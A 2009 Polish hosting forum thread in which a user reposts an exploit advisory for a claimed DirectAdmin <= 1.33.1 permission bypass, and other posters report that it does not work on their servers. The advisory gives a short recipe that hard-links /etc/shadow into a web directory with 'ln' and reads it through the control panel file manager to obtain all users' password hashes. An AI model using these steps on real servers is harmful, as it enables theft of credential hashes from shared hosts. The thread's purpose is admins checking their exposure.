lukaschemp 27 Zgłoś post Napisano Marzec 25, 2009 Osobiście testowałem i na szczęście nie działa, sprawdźcie u siebie. /H\ /T\ |T-HHHHHHH-T| HHHHHHHHHH| HHHHHHHHHH| H-T H-T \T-HHHHH-T/ HHHHHHHHH/ HHHHHHHHH/ H-T H-T H-T H-T H-T H-THHHHHH-T /HHHHH\ H-T H-T H-T H-THHHHHH-T THHHHHT H-T H-T H-T H-T H-T \HHHHH/ H-T H-T H-T H-T H-T H-T H-T H-T H-T H-T H-T /H\ HHHHHHHHH\ HHHHHHHHH\ \H/ \T/ H-T \T/ HHHHHHHHHH| HHHHHHHHHH| DirectAdmin <= 1.33.1 Permission Bypass UID="0" Auther : S4S-T3rr0r!sT Home : http://www.hackteach.org, http://www.h-t.cc msn : l3t@hotmail.com / s4s@n2m3.com ..................................... As known that the DirectAdmin Control Panel is better than Cpanel .. But this is a vuln on it .. 0-day First : Exploiter should execute any command on the host .. use the 'ln' command for make a symbolic link example : In The root path => /home/attackeruser/domains/attackersite.com/public_html/ Execute : ln /etc/shadow After that Go to The Control Panel https://attackersite.com:2222/CMD_FILE_MANAGER/domains/attackersite.com/public_html/shadow Its now should be the same as attackersite.com Permission You can read the shadow and see all server users hashs Also its runs on the other users of server .. ..................................... Udostępnij ten post Link to postu Udostępnij na innych stronach
ksk 67 Zgłoś post Napisano Marzec 25, 2009 ufff u mnie też nie działa na szczęście Udostępnij ten post Link to postu Udostępnij na innych stronach
www.follownet.pl 8 Zgłoś post Napisano Marzec 26, 2009 U mnie też problem nie potwierdzony. Tutaj szersza dyskusja na ten temat. Udostępnij ten post Link to postu Udostępnij na innych stronach